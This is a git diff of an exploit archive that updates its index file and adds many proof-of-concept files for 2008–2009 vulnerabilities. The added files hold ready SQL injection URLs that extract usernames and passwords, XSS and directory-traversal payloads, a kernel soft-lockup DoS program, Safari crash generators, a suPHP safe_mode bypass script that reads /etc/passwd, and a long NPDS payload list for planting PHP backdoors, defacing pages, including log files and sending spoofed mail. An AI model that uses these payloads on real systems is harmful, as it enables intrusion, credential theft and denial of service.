diff --git a/files.csv b/files.csv index f93aff1e7..1d559656f 100755 --- a/files.csv +++ b/files.csv @@ -29420,7 +29420,6 @@ id,file,description,date,author,platform,type,port 32656,platforms/php/webapps/32656.txt,"Octeth Oempro 3.5.5 Multiple SQL Injection Vulnerabilities",2008-12-01,"security curmudgeon",php,webapps,0 32657,platforms/windows/remote/32657.py,"Nokia N70 and N73 Malformed OBEX Name Header Remote Denial of Service Vulnerability",2008-12-12,NCNIPC,windows,remote,0 32658,platforms/asp/webapps/32658.txt,"ASP-DEV XM Events Diary 'cat' Parameter SQL Injection Vulnerability",2008-12-13,Pouya_Server,asp,webapps,0 -32659,platforms/hardware/webapps/32659.txt,"ICOMM 610 Wireless Modem - CSRF Vulnerability",2014-04-02,"Blessen Thomas",hardware,webapps,0 32660,platforms/asp/webapps/32660.txt,"CIS Manager CMS - SQL Injection",2014-04-02,"felipe andrian",asp,webapps,0 32661,platforms/windows/remote/32661.html,"Evans FTP 'EvansFTP.ocx' ActiveX Control Multiple Remote Buffer Overflow Vulnerabilities",2008-12-14,Bl@ckbe@rD,windows,remote,0 32662,platforms/php/webapps/32662.py,"WebPhotoPro Multiple SQL Injection Vulnerabilities",2008-12-14,baltazar,php,webapps,0 @@ -29436,3 +29435,25 @@ id,file,description,date,author,platform,type,port 32673,platforms/multiple/remote/32673.java,"GNU Classpath 0.97.2 'gnu.java.security.util.PRNG' Class Entropy Weakness (1)",2008-12-05,"Jack Lloyd",multiple,remote,0 32674,platforms/multiple/remote/32674.cpp,"GNU Classpath 0.97.2 'gnu.java.security.util.PRNG' Class Entropy Weakness (2)",2008-12-05,"Jack Lloyd",multiple,remote,0 32675,platforms/linux/dos/32675.py,"QEMU 0.9 and KVM 36/79 VNC Server Remote Denial of Service Vulnerability",2008-12-22,"Alfredo Ortega",linux,dos,0 +32676,platforms/php/webapps/32676.txt,"PECL Alternative PHP Cache Local 3 HTML Injection Vulnerability",2008-12-19,"Moritz Naumann",php,webapps,0 +32677,platforms/jsp/webapps/32677.txt,"Openfire <= 3.6.2 'group-summary.jsp' Cross-Site Scripting Vulnerability",2009-01-08,"Federico Muttis",jsp,webapps,0 +32678,platforms/jsp/webapps/32678.txt,"Openfire <= 3.6.2 'user-properties.jsp' Cross-Site Scripting Vulnerability",2009-01-08,"Federico Muttis",jsp,webapps,0 +32679,platforms/jsp/webapps/32679.txt,"Openfire <= 3.6.2 'log.jsp' Cross-Site Scripting Vulnerability",2009-01-08,"Federico Muttis",jsp,webapps,0 +32680,platforms/jsp/webapps/32680.txt,"Openfire 3.6.2 'log.jsp' Directory Traversal Vulnerability",2009-01-08,"Federico Muttis",jsp,webapps,0 +32681,platforms/hardware/remote/32681.txt,"COMTREND CT-536 and HG-536 Routers Multiple Remote Vulnerabilities",2008-12-22,"Daniel Fernandez Bleda",hardware,remote,0 +32682,platforms/linux/dos/32682.c,"Linux Kernel 2.6.x 'qdisc_run()' Local Denial of Service Vulnerability",2008-12-23,"Herbert Xu",linux,dos,0 +32683,platforms/asp/webapps/32683.txt,"Mavi Emlak 'newDetail.asp' SQL Injection Vulnerability",2008-12-29,"Sina Yazdanmehr",asp,webapps,0 +32684,platforms/windows/remote/32684.c,"Microsoft Windows Media Player 9/10/11 WAV File Parsing Code Execution Vulnerability",2008-12-29,anonymous,windows,remote,0 +32685,platforms/php/webapps/32685.txt,"ViArt Shop 3.5 manuals_search.php manuals_search Parameter XSS",2008-12-29,"Xia Shing Zee",php,webapps,0 +32686,platforms/multiple/remote/32686.xml,"MagpieRSS 0.72 CDATA HTML Injection Vulnerability",2008-12-29,system_meltdown,multiple,remote,0 +32687,platforms/asp/webapps/32687.txt,"Madrese-Portal 'haber.asp' SQL Injection Vulnerability",2008-12-29,"Sina Yazdanmehr",asp,webapps,0 +32688,platforms/windows/remote/32688.py,"Winace 2.2 Malformed Filename Remote Denial of Service Vulnerability",2008-12-29,cN4phux,windows,remote,0 +32689,platforms/php/webapps/32689.txt,"NPDS Versions Prior to 08.06 Multiple Input Validation Vulnerabilities",2008-12-04,"Jean-François Leclerc",php,webapps,0 +32690,platforms/linux/remote/32690.txt,"xterm DECRQSS Remote Command Execution Vulnerability",2008-12-29,"Paul Szabo",linux,remote,0 +32692,platforms/hardware/dos/32692.txt,"Symbian S60 Malformed SMS/MMS Remote Denial Of Service Vulnerability",2008-12-30,"Tobias Engel",hardware,dos,0 +32693,platforms/php/local/32693.php,"suPHP <= 0.7 'suPHP_ConfigPath' Safe Mode Restriction-Bypass Vulnerability",2008-12-31,Mr.SaFa7,php,local,0 +32694,platforms/osx/dos/32694.pl,"Apple Safari 3.2 WebKit 'alink' Property Memory Leak Remote Denial of Service Vulnerability (1)",2009-01-01,"Jeremy Brown",osx,dos,0 +32695,platforms/osx/dos/32695.php,"Apple Safari 3.2 WebKit 'alink' Property Memory Leak Remote Denial of Service Vulnerability (2)",2009-01-01,Pr0T3cT10n,osx,dos,0 +32696,platforms/linux/dos/32696.txt,"KDE Konqueror 4.1 Multiple Cross-Site Scripting and Denial of Service Vulnerabilities",2009-01-02,athos,linux,dos,0 +32697,platforms/linux/dos/32697.pl,"aMSN '.ctt' File Remote Denial of Service Vulnerability",2009-01-03,Hakxer,linux,dos,0 +32698,platforms/php/webapps/32698.txt,"SolucionXpressPro 'main.php' SQL Injection Vulnerability",2009-01-05,Ehsan_Hp200,php,webapps,0 diff --git a/platforms/asp/webapps/32683.txt b/platforms/asp/webapps/32683.txt new file mode 100755 index 000000000..d723d363f --- /dev/null +++ b/platforms/asp/webapps/32683.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/33041/info + +Mavi Emlak is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input. + +Attackers may exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/newDetail.asp?haberNo=-9999%20union%20select%200,username,password,3,4,5%20from%20Danismanlar \ No newline at end of file diff --git a/platforms/asp/webapps/32687.txt b/platforms/asp/webapps/32687.txt new file mode 100755 index 000000000..26258cdca --- /dev/null +++ b/platforms/asp/webapps/32687.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/33045/info + +Madrese-Portal is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input. + +Attackers may exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/[path]/haber.asp?haber=-999'%20union%20select%200,1,ad,3,4%20from%20Kullanici%20where%20'1 + +http://www.example.com/[path]/haber.asp?haber=-999'%20union%20select%200,1,sifre,3,4%20from%20Kullanici%20where%20'1 \ No newline at end of file diff --git a/platforms/hardware/dos/32692.txt b/platforms/hardware/dos/32692.txt new file mode 100755 index 000000000..5b7010445 --- /dev/null +++ b/platforms/hardware/dos/32692.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/33072/info + +Symbian S60 is prone to a denial-of-service vulnerability. + +Attackers can exploit this issue to prevent users from sending or receiving SMS or MMS messages. + +This issue affects handsets using Symbian S60. + +The following example message is available: + +"123456789@123456789.1234567890123 " + diff --git a/platforms/hardware/remote/32681.txt b/platforms/hardware/remote/32681.txt new file mode 100755 index 000000000..aaefb59b5 --- /dev/null +++ b/platforms/hardware/remote/32681.txt @@ -0,0 +1,17 @@ +source: http://www.securityfocus.com/bid/32975/info + +COMTREND CT-536 and HG-536 are prone to multiple remote vulnerabilities: + +- Multiple unauthorized-access vulnerabilities +- An information-disclosure vulnerability +- Multiple cross-site scripting vulnerabilities +- A denial-of-service vulnerability +- Multiple buffer-overflow vulnerabilities + +Attackers can exploit these issues to compromise the affected device, obtain sensitive information, execute arbitrary script code, steal cookie-based authentication credentials, and cause a denial-of-service condition. Other attacks are also possible. + +The following firmware versions are vulnerable; additional versions may also be affected: +CT-536 A101-302JAZ-C01_R05 +HG-536+ A101-302JAZ-C01_R05 and A101-302JAZ-C03_R14.A2pB021g.d15h + +http://www.example.com/scvrtsrv.cmd?action=add&srvName=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&srvAddr=192.168.1.1&proto=1,&eStart=1,&eEnd=1,&iStart=1,&iEnd http://www,example.com/password.html \ No newline at end of file diff --git a/platforms/hardware/webapps/32659.txt b/platforms/hardware/webapps/32659.txt deleted file mode 100755 index 389c171ef..000000000 --- a/platforms/hardware/webapps/32659.txt +++ /dev/null @@ -1,53 +0,0 @@ -Exploit Title : ICOMM 610 Wireless Modem CSRF Vulnerability - -Google dork : N/A - -Date : 02/04/2014 - -Exploit Author : Blessen Thomas - -Vendor Homepage : http://www.icommtele.com/ - -Software Link : N/A - -Version : ICOMM 610 - -Tested on : Device software version 01.01.08.991 (10/01/2010) - -Type of Application : Modem Web Application - -CVE : N/A - -Cross Site Request Forgery - -It was observed that this modem's Web Application , suffers from Cross-site - -request forgery through which attacker can manipulate user data via sending -him malicious craft url. - - -At attacker could change the password of the victim's account without the -victim's knowledge as the - -application is not having a security token implemented. - - -The Modem's application is not using any security token to prevent it -against CSRF. You can manipulate any userdata. PoC and Exploit to change -user password: In the POC the IP address in the POST is the modems IP -address. - - - - - - -
- - - - -
- - - diff --git a/platforms/jsp/webapps/32677.txt b/platforms/jsp/webapps/32677.txt new file mode 100755 index 000000000..ff38057a7 --- /dev/null +++ b/platforms/jsp/webapps/32677.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/32937/info + +Openfire is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +Openfire 3.6.2 is vulnerable; prior versions may also be affected. + +http://www.example.com/group-summary.jsp?search=%22%3E%3C[xss] \ No newline at end of file diff --git a/platforms/jsp/webapps/32678.txt b/platforms/jsp/webapps/32678.txt new file mode 100755 index 000000000..c99c4f345 --- /dev/null +++ b/platforms/jsp/webapps/32678.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/32938/info + +Openfire is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +Openfire 3.6.2 is vulnerable; prior versions may also be affected. + +http://www.example.com/user-properties.jsp?username=%3C[xss] \ No newline at end of file diff --git a/platforms/jsp/webapps/32679.txt b/platforms/jsp/webapps/32679.txt new file mode 100755 index 000000000..b44e43a6d --- /dev/null +++ b/platforms/jsp/webapps/32679.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/32940/info + +Openfire is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +Openfire 3.6.2 is vulnerable; prior versions may also be affected. + +http://www.example.com/log.jsp?log=%3Cimg%20src=%27%27%20onerror=%27[xss] \ No newline at end of file diff --git a/platforms/jsp/webapps/32680.txt b/platforms/jsp/webapps/32680.txt new file mode 100755 index 000000000..c01219c1e --- /dev/null +++ b/platforms/jsp/webapps/32680.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/32945/info + +Openfire is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data. + +Exploiting the issue may allow an attacker to obtain sensitive information that could aid in further attacks. + +Openfire 3.6.2 is vulnerable; prior versions may also be affected. + +http://www.example.com/log.jsp?log=..\..\..\windows\debug\netsetup \ No newline at end of file diff --git a/platforms/linux/dos/32682.c b/platforms/linux/dos/32682.c new file mode 100755 index 000000000..94942e200 --- /dev/null +++ b/platforms/linux/dos/32682.c @@ -0,0 +1,64 @@ +source: http://www.securityfocus.com/bid/32985/info + +The Linux kernel is prone to a local denial-of-service vulnerability. + +Local attackers can exploit this issue to cause a soft lockup, denying service to legitimate users. + +Versions prior to Linux kernel 2.6.25 are vulnerable. + +#include +#include +#include +#include + +#define MAXTASKS 200 +int main(int argc, char *argv[]) +{ + int i; + char cmd[128]; + FILE *f; + pid_t pids[MAXTASKS]; + pid_t pid; + unsigned int num; + + if (argc < 3) { + printf("enter netserver hostname as the first parameter\n"); + printf("enter number of netperf tasks as the second parameter\n"); + return 1; + } + + f = fopen("/dev/null", "w"); + if (!f) { + printf("cannot open /dev/nu;;\n"); + return 2; + } + sprintf(cmd, "netperf -H %s -l 60 -t UDP_STREAM -- -s 262144 -r 262144 -m 16384", argv[1]); + + num = atoi(argv[2]); + if (num > MAXTASKS) { + printf("number of tasks is too high, resetting to %ld\n", MAXTASKS); + num = MAXTASKS; + } + + for(i = 0; i < num; i++) { + pid = fork(); + if (pid == 0) { + fclose(stdout); + fclose(stderr); + stdout = f; + stderr = f; + execl("/bin/sh", "/bin/sh", "-c", cmd, NULL); + } + else { + printf("newpid: %d\n", pid); + pids[i] = pid; + } + } + for(i = 0; i < num; i++) { + waitpid(pids[i], NULL, 0); + } + + fclose(f); + + return 0; +} diff --git a/platforms/linux/dos/32696.txt b/platforms/linux/dos/32696.txt new file mode 100755 index 000000000..71b1b7d5e --- /dev/null +++ b/platforms/linux/dos/32696.txt @@ -0,0 +1,15 @@ +source: http://www.securityfocus.com/bid/33085/info + +KDE Konqueror is prone to multiple cross-site scripting vulnerabilities and multiple denial-of-service vulnerabilities because the application fails to sufficiently sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, or cause the affected browser to crash. + +KDE Konqueror 4.1 is vulnerable; other versions may also be affected. + +applications:/Here +trash:/Here +remote:/Here +applications:/THE GAME +applications:/ +]]> + + + + + diff --git a/platforms/osx/dos/32694.pl b/platforms/osx/dos/32694.pl new file mode 100755 index 000000000..b1d6fb3bd --- /dev/null +++ b/platforms/osx/dos/32694.pl @@ -0,0 +1,39 @@ +source: http://www.securityfocus.com/bid/33080/info + +Apple Safari is prone to a denial-of-service vulnerability that resides in the WebKit library. + +Remote attackers can exploit this issue to crash the affected browser, denial-of-service condition. + +Apple Safari 3.2 running on Microsoft Windows Vista is vulnerable; other versions running on different platforms may also be affected. + +Note (December 20, 2010): Safari on iOS 4.0.1 is also vulnerable. + +#!/usr/bin/perl +# safari_webkit_ml.pl +# Safari (Webkit) 3.2 Remote Memory Leak Exploit +# Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com] +# Access violation when writing to [00000018] +# EIP 6B00A02B WebKit.6B00A02B +# LastError 00000008 ERROR_NOT_ENOUGH_MEMORY +# Memory leaks are common in browsers.. tested on Vista SP1 +# Compliments of bf2 + +$filename = $ARGV[0]; +if(!defined($filename)) +{ + + print "Usage: $0 \n"; + +} + +$head = "" . "\n"; +$trig = "" . "\n"; +$foot = ""; + +$data = $head . $trig . $foot; + + open(FILE, '>' . $filename); + print FILE $data; + close(FILE); + +exit; \ No newline at end of file diff --git a/platforms/osx/dos/32695.php b/platforms/osx/dos/32695.php new file mode 100755 index 000000000..fe9ddbb05 --- /dev/null +++ b/platforms/osx/dos/32695.php @@ -0,0 +1,55 @@ +source: http://www.securityfocus.com/bid/33080/info + +Apple Safari is prone to a denial-of-service vulnerability that resides in the WebKit library. + +Remote attackers can exploit this issue to crash the affected browser, denial-of-service condition. + +Apple Safari 3.2 running on Microsoft Windows Vista is vulnerable; other versions running on different platforms may also be affected. + +Note (December 20, 2010): Safari on iOS 4.0.1 is also vulnerable. + + +# ----------------------------------- +# Exploit Title: Apple iPhone Safari (body alink) Remote Crash +# Date: 19/12/2010 +# Author: Pr0T3cT10n +# Affected Version: IOS 4.0.1 +# Tested on Apple iPhone 3, IOS 4.0.1 MobileSafari +# Launch Safari, point your browser to the page and safari will crash. +# ISRAEL, NULLBYTE.ORG.IL +$string = str_repeat('A', 12000085); +$code = " + + Apple iPhone Safari (body alink) Remote Crash + + + +"; +if(file_put_contents("./crash.html", $code)) { + echo("Point your safari mobile browser to `crash.html`.\r\n"); +} else { + echo("Cannot create file.\r\n"); +} +?> diff --git a/platforms/php/local/32693.php b/platforms/php/local/32693.php new file mode 100755 index 000000000..5c6aaa754 --- /dev/null +++ b/platforms/php/local/32693.php @@ -0,0 +1,70 @@ +source: http://www.securityfocus.com/bid/33073/info + +suPHP is prone to a 'safe_mode' restriction-bypass vulnerability. + +Successful exploits may allow attackers to bypass arbitrary PHP configuration options, including the 'safe_mode' setting. + +This vulnerability would be an issue in shared-hosting configurations where multiple users can create and execute arbitrary PHP script code, with the 'safe_mode' restrictions assumed to isolate the users from each other. + + 2.x suphp (suPHP_ConfigPath) bypass safe mode exploit +Author : Mr.SaFa7 +Home : v4-team.com +note : this exploit for education :) +*/ + + +echo "[+] Start...\n"; + +$bypfile=fopen('php.ini','w+'); +$stuffile=fopen('.htaccess','w+'); +if($bypfile and $stuffile!= NULL){ + +echo "[+] evil files created succes ! \n"; + +} +else{ +echo "[-] access denial ! \n"; + +} +$byprullz1="safe_mode = OFF + +"; + +$byprullz2="disable_functions = NONE"; +$dj=fwrite($bypfile,$byprullz1); + +$dj1=fwrite($bypfile,$byprullz2); + +fclose($bypfile); +if($dj and $dj1!= NULL){ +echo "[+] php.ini writed \n"; + +} +else{ +echo "[-] 404 php.ini not found !\n"; +} +$breakrullz="suPHP_ConfigPath /home/user/public_html/php.ini"; // replace this '/home/user/public_html' by ur path + +$sf7=fwrite($stuffile,$breakrullz); + +fclose($stuffile); +if($sf7!= NULL){ + +echo "[+] evil .htaccess writed\n"; +echo "[+] exploited by success!\n\n\n"; +echo "\t\t\t[+] discouvred by Mr.SaFa7\n"; +echo "\t\t\t[+] home : v4-team.com\n"; +echo "\t\t\t[+] Greetz : djekmani4ever ghost hacker Str0ke ShAfEKo4EvEr Mr.Mn7oS\n"; +} +else{ + +echo "[-] evil .htaccess Not found!\n"; +} + + +system("pwd;ls -lia;uname -a;cat /etc/passwd"); + +#EOF +?> diff --git a/platforms/php/webapps/32676.txt b/platforms/php/webapps/32676.txt new file mode 100755 index 000000000..8a6947566 --- /dev/null +++ b/platforms/php/webapps/32676.txt @@ -0,0 +1,15 @@ +source: http://www.securityfocus.com/bid/32934/info + +PECL Alternative PHP Cache is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. + +Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. + +Alternative PHP Cache 3.1.1 and 3.0.19 are vulnerable; other versions may also be affected. + +A malicious user with local write access (such as an FTP user on shared +hosting environments) may create two directories + \ No newline at end of file diff --git a/platforms/php/webapps/32689.txt b/platforms/php/webapps/32689.txt new file mode 100755 index 000000000..01bbb53f2 --- /dev/null +++ b/platforms/php/webapps/32689.txt @@ -0,0 +1,304 @@ +source: http://www.securityfocus.com/bid/33051/info + +NPDS is prone to multiple input-validation vulnerabilities: + +- Multiple local file-include vulnerabilities +- An HTML-injection vulnerability +- Multiple SQL-injection vulnerabilities +- Multiple cross-site scripting vulnerabilities + +Exploiting these issues can allow an attacker to steal cookie-based authentication credentials, view and execute arbitrary local files within the context of the webserver, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Other attacks may also be possible. + +Versions prior to NPDS 08.06 are vulnerable. + +http:/www.example.com/npds/modules/annonces/config.php?admin=1&tit=";%0Apassthru(stripslashes(urldecode($_GET['cmd'])));%0Aecho%20" +/npds/modules/annonces/config.php +Create backdoor and/or inject code into connect.inc.php file + + + BACKDOOR PHP + http:/www.example.com/npds/modules/last-fm/admin/adm_save.php?ModPath=../../../../../test.php%00&lastfm_username=";%0Asystem($_GET['dir']);%0Aecho%20" + + DEFACE + http:/www.example.com/npds/modules/last-fm/admin/adm_save.php?ModPath=../../../../../index.html%00&lastfm_username=";%0APHP?>OWNED%20BY%20NOSP +!!!Fichier : + + + + + + + +/npds/modules/upload/upload.php +Create backdoor and/or inject code into security.log file + + http:/www.example.com/npds/footer.php?Default_Theme=../logs\security.log%00 +/npds/footer.php +Include + + http:/www.example.com/npds/modules/annonces/affi_ann.php?ModPath=../../logs/security.log%00 +/npds/modules/annonces/affi_ann.php +Include + + http:/www.example.com/npds/modules/annonces/affi_img.php?ModPath=../../logs/security.log%00 +/npds/modules/annonces/affi_img.php +Include + + http:/www.example.com/npds/modules/affiche.php?ModPath=../../logs/security.log%00 +/npds/modules/annonces/affiche.php +Include + + http:/www.example.com/npds/modules/annul.php?ModPath=../../logs/security.log%00& +/npds/modules/annul.php +Include + + http:/www.example.com//npds/modules/block_partenaires.php?language=../../../../../../logs/security.log%00 +/npds/modules/block_partenaires.php +Include + + http:/www.example.com/npds/modules/chargement.php?ModPath=../../logs/security.log%00 +/npds/modules/chargement.php +Include + +\ + http:/www.example.com/npds/modules/deezer/admin/index.php?ModPath=../../../../logs/security.log%00 OU +http:/www.example.com/npds/modules/deezer/admin/index.php?language=../../../../../../logs/security.log%00 +/npds/modules/deezer/admin/index.php +Include + + http:/www.example.com/npds/modules/deezer/deezer.php?language=../../../../../logs/security.log%00 +/npds/modules/deezer/deezer.php +Include + + http:/www.example.com/npds/modules/deezer/deezermod.php?language=../../../../logs/security.log%00 +/npds/modules/deezer/deezermod.php +Include + + http:/www.example.com/npds/modules/G-annonces/admin/adm_ann.php?ModPath=../../../../../../logs/security.log%00 +/npds/modules/G-annonces/admin/adm_ann.php +Include + + http:/www.example.com/npds/modules/G-annonces/admin/?ModPath=../../../../../../logs/security.log%00 +/npds/modules/G-annonces/admin/index.php +Include + + http:/www.example.com/npds/modules/G-annonces/annonce_form.php?ModPath=../../../logs/security.log%00 +/npds/modules/G-annonces/annonce_form.php +Include + + http:/www.example.com/npds/modules/G-annonces/index.php?ModPath=../../../../../logs/security.log%00 +/npds/modules/G-annonces/index.php +Include + + http:/www.example.com/npds/modules/G-annonces/list_ann.php?ModPath=../../../../../logs/security.log%00 +/npds/modules/G-annonces/list_ann.php +Include + + http:/www.example.com/npds/modules/G-annonces/modif_ann.php?ModPath=../../../../../logs/security.log%00 +/npds/modules/G-annonces/modif_ann.php +Include + + http:/www.example.com/npds/modules/G-annonces/search.php?ModPath=../../../../../logs/security.log%00 +/npds/modules/G-annonces/search.php +Include + + http:/www.example.com/npds/modules/GS-annonces/print.php?ModPath=../../../logs/security.log%00 +/npds/modules/GS-annonces/print.php +Include + + http:/www.example.com/npds/modules/last-fm/admin/adm.php?ModPath=../../../../logs/security.log%00 OU +http:/www.example.com/npds/modules/last-fm/admin/adm.php?language=../../../../../logs/security.log%00 +/npds/modules/last-fm/admin/adm.php +Include + + http:/www.example.com/npds/modules/last-fm/admin/adm_save.php?ModPath=../../../../../logs/security.log%00 +/npds/modules/last-fm/admin/adm_save.php +Include + + + http:/www.example.com/npds/modules/last-fm/error.php?ModPath=../../../../logs/security.log%00 ET +http:/www.example.com/npds/modules/last-fm/error.php?language=../../../../../logs/security.log%00 +/npds/modules/last-fm/error.php +Include + + http:/www.example.com/npds/modules/last-fm/last-fm.php?language=../../../../../../logs/security.log%00 +/npds/modules/last-fm/last-fm.php +Include + + http:/www.example.com/npds/modules/links/admin/create_tables.php?ModPath=../../../../logs/security.log%00/admin%00 +/npds/modules/links/admin/create_tables.php +Include + + http:/www.example.com/npds/modules/saisie.php?user=1&ModPath=../../logs/security.log%00 +/npds/modules/saisie.php +Include + + http:/www.example.com/npds/modules/td-galerie/admin/adm.php?ModPath=../../../.././logs/security.log%00 +/npds/modules/td-galerie/admin/adm.php +Include + + http:/www.example.com/npds/modules/td-glossaire/glossadmin.php?ModPath=../../../logs/security.log%00 OU +http:/www.example.com/npds/modules/td-glossaire/glossadmin.php?language=../../../../../logs/security.log%00 +/npds/modules/td-glossaire/glossadmin.php +Include + + http:/www.example.com/npds/modules/td-glossaire/glossaire.php?ModPath=../../../logs/security.log%00 OU +http:/www.example.com/npds/modules/td-glossaire/glossaire.php?language=../../../../../logs/security.log%00 +/npds/modules/td-glossaire/glossaire.php +Include + + http:/www.example.com/npds/modules/td-livredor/admin/livradmin.php?language=../../../../../../../logs/security.log%00 +/npds/modules/td-livredor/admin/livradmin.php +Include + + http:/www.example.com/npds/modules/td-livredor/envoi.php?ModPath=../../../logs/security.log%00OUhttp:/www.example.com/npds/modules/td-livredor/envoi.php?language=.. +/../../../logs/security.log%00 +/npds/modules/td-livredor/envoi.php +Include + + http:/www.example.com/npds/modules/td-livredor/error.php?ModPath=../../../logs/security.log%00OUhttp:/www.example.com/npds/modules/td-livredor/error.php?language=.. +/../../../logs/security.log%00 +/npds/modules/td-livredor/error.php +Include + + http:/www.example.com/npds/modules/td-livredor/error.php?ModPath=../../../logs/security.log%00OUhttp:/www.example.com/npds/modules/td-livredor/error.php?language=.. +/../../../logs/security.log%00 +/npds/modules/td-livredor/error.php +Include + + http:/www.example.com/npds/modules/td-livredor/livre.php?language=../../../../../logs/security.log%00 +/npds/modules/td-livredor/livre.php +Include + + http:/www.example.com/npds/modules/td-livredor/livre.php?language=../../../../../logs/security.log%00 +/npds/modules/td-livredor/livre.php +Include + + http:/www.example.com/npds/modules/td-livredor/livre.php?language=../../../../logs/security.log%00 +/npds/modules/td-livredor/livre.php +Include + + http:/www.example.com/npds/modules/TvGuide/index.php?ModPath=../../../logs/security.log%00 + http:/www.example.com/npds/modules/TvGuide/index.php?language=../../../logs/security.log%00 +/npds/modules/TvGuide/index.php +Include + + http:/www.example.com/npds/modules/G-annonces/modif_ann.php?ModPath=../../../index.php%00&op=modifier&HTTP_POST_VARS[code]=60000&id=1&table_annonces=annonces& +HTTP_POST_VARS[tel]=Owned%20!! +/npds/modules/G-annonces/modif_ann.php +Modify all comment without login/password + + http:/www.example.com/npds/friend.php?op=SendSite&yname=bill%20gates%20%0ATo:victime@poor.fr%0ASubject%20:%20XP%20SP%203%0A%0ADownload%2 +0last%20SP%203%20for%20Win%20XP%20in%20www.fakewebsite.com%0A&ymail=ex_pdg@microsoft.com&fname=jfl%0A&fmail=victim2@poor.net +/npds/friend.php +Send fake mail, spam + + + http:/www.example.com/npds/modules/G-annonces/index.php?ModPath=../../../index.php%00&ble_annonces=`users`/* +/npds/modules/G-annonces/index.php +SQL Inject + + http:/www.example.com/npds/modules/G-annonces/list_ann.php?ModPath=../../../index.php%00&table_annonces=annonces%20UNION%20SELECT%200,0,0,CONCAT(aid,char(58), +name,char(58),url,char(58),email,char(58),pwd,char(58)),0,0,0,0,0%20FROM%20authors/* +/npds/modules/G-annonces/list_ann.php +SQL Inject + + http:/www.example.com/npds/modules/G-annonces/search.php?ModPath=../../../index.php%00&HTTP_POST_VARS[action]=ajouter&table_annonces=annonces%20UNION%20SELECT +%200,0,CONCAT(aid,char(58),name,char(58),url,char(58),email,char(58),pwd,char(58)),CONCAT(aid,char(58),name,char(58),url,char(58),email,char(58),pwd,char +(58)),0,0,0,0,0%20FROM%20authors/* +/npds/modules/G-annonces/search.php +SQL Inject + + http:/www.example.com/npds/modules/G-annonces/index.php?ModPath=../../../index.php%00&table_cat=annonces_cat%20UNION%20SELECT%20CONCAT(aid,char(58),name,char( +58),url,char(58),email,char(58),pwd,char(58)),CONCAT(aid,char(58),name,char(58),url,char(58),email,char(58),pwd,char(58))%20FROM%20authors/*&table_annonc +es=`annonces`http:/www.example.com/npds/modules/G-annonces/index.php?ModPath=../../../index.php%00&table_cat=faqcategories%20UNION%20SELECT%20CONCAT(aid,char(5 +8),name,char(58),url,char(58),email,char(58),pwd,char(58)),CONCAT(aid,char(58),name,char(58),url,char(58),email,char(58),pwd,char(58))%20FROM%20authors/* +&table_annonces=`annonces` WHERE `date`<1/* +/npds/modules/G-annonces/index.php +SQL Inject + +ECT%200,0,CONCAT(aid,char(58),name,char(58),url,char(58),email,char(58),pwd,char(58)),CONCAT(aid,char(58),name,char(58),url,char(58),email,char(58),pwd,c +har(58)),0,0,0,0,0%20FROM%20authors/* +/npds/modules/G-annonces/modif_ann.php +SQL Inject + + http:/www.example.com/npds/modules/G-annonces/admin/adm_ann.php?ModPath=../../../../mainfile.php%00&id_user=1&table_annonces=annonces%20UNION%20SELECT%20CONCA +T(aid,char(58),name,char(58),url,char(58),email,char(58),pwd),CONCAT(aid,char(58),name,char(58),url,char(58),email,char(58),pwd),CONCAT(aid,char(58),name +,char(58),url,char(58),email,char(58),pwd),CONCAT(aid,char(58),name,char(58),url,char(58),email,char(58),pwd),CONCAT(aid,char(58),name,char(58),url,char( +58),email,char(58),pwd),CONCAT(aid,char(58),name,char(58),url,char(58),email,char(58),pwd),CONCAT(aid,char(58),name,char(58),url,char(58),email,char(58), +pwd),CONCAT(aid,char(58),name,char(58),url,char(58),email,char(58),pwd),CONCAT(aid,char(58),name,char(58),url,char(58),email,char(58),pwd)%20FROM%20autho +rs/* +/npds/modules/G-annonces/admin/adm_ann.php +SQL Inject & Include + + http:/www.example.com/npds/modules/G-annonces/admin/adm_cat.php?ModPath=../../../../../../npds/index.php%00&HTTP_POST_VARS[action]=ajouter&HTTP_POST_VARS[tabl +e_cat]=%20`users_status`%20(%20`posts`%20,%20`attachsig`%20,%20`rank`%20,%20`level`%20,%20`open`)%20VALUES%20(1,%200,%200,%202,%201)/* OU RECUP DE MOT DE +PASSE ROOT +http:/www.example.com/npds/modules/G-annonces/admin/adm_cat.php?ModPath=../../../../mainfile.php%00&HTTP_POST_VARS[action]=ajouter&HTTP_POST_VARS[table_cat]=fa +qcategories%20UNION%20SELECT%20CONCAT(aid,char(58),name,char(58),url,char(58),email,char(58),pwd,char(58)),CONCAT(aid,char(58),name,char(58),url,char(58) +,email,char(58),pwd,char(58))%20FROM%20authors/* +/npds/modules/G-annonces/admin/adm_cat.php +SQL Inject 